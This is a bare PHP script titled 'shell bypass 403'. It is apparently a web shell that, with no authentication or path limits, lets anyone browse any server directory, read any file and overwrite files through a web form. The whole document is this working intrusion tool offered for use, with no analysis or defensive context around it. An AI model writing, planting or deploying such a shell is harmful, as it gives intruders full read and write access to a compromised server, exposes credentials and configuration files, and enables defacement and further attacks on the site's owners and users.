shell bypass 403
<?php
if (isset($_GET['dir'])) {
$currentDir = realpath($_GET['dir']);
} else {
$currentDir = getcwd();
}
echo "<h2>Current Directory: $currentDir</h2>";
echo "<ul>";
if ($currentDir !== dirname($currentDir)) {
echo "<li><a href='?dir=" . urlencode(dirname($currentDir)) . "'>[Go Up]</a></li>";
}
$files = scandir($currentDir);
foreach ($files as $file) {
if ($file !== '.') {
$filePath = $currentDir . DIRECTORY_SEPARATOR . $file;
if (is_dir($filePath)) {
echo "<li>[DIR] <a href='?dir=" . urlencode($filePath) . "'>$file</a></li>";
} else {
echo "<li><a href='?file=" . urlencode($filePath) . "'>$file</a> | <a href='?edit=" . urlencode($filePath) . "'>[Edit]</a></li>";
}
}
}
echo "</ul>";
// File viewing
if (isset($_GET['file'])) {
$fileToView = realpath($_GET['file']);
if (file_exists($fileToView)) {
echo "<h3>Viewing File: " . htmlspecialchars($fileToView) . "</h3>";
echo "<pre>" . htmlspecialchars(file_get_contents($fileToView)) . "</pre>";
}
}
// File editing
if (isset($_GET['edit'])) {
$fileToEdit = realpath($_GET['edit']);
if (file_exists($fileToEdit)) {
if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_POST['content'])) {
file_put_contents($fileToEdit, $_POST['content']);
echo "<p>File saved successfully!</p>";
}
echo "<h3>Editing File: " . htmlspecialchars($fileToEdit) . "</h3>";
echo "<form method='post'>";
echo "<textarea name='content' rows='20' cols='80'>" . htmlspecialchars(file_get_contents($fileToEdit)) . "</textarea><br>";
echo "<input type='submit' value='Save File'>";
echo "</form>";
}
}
?>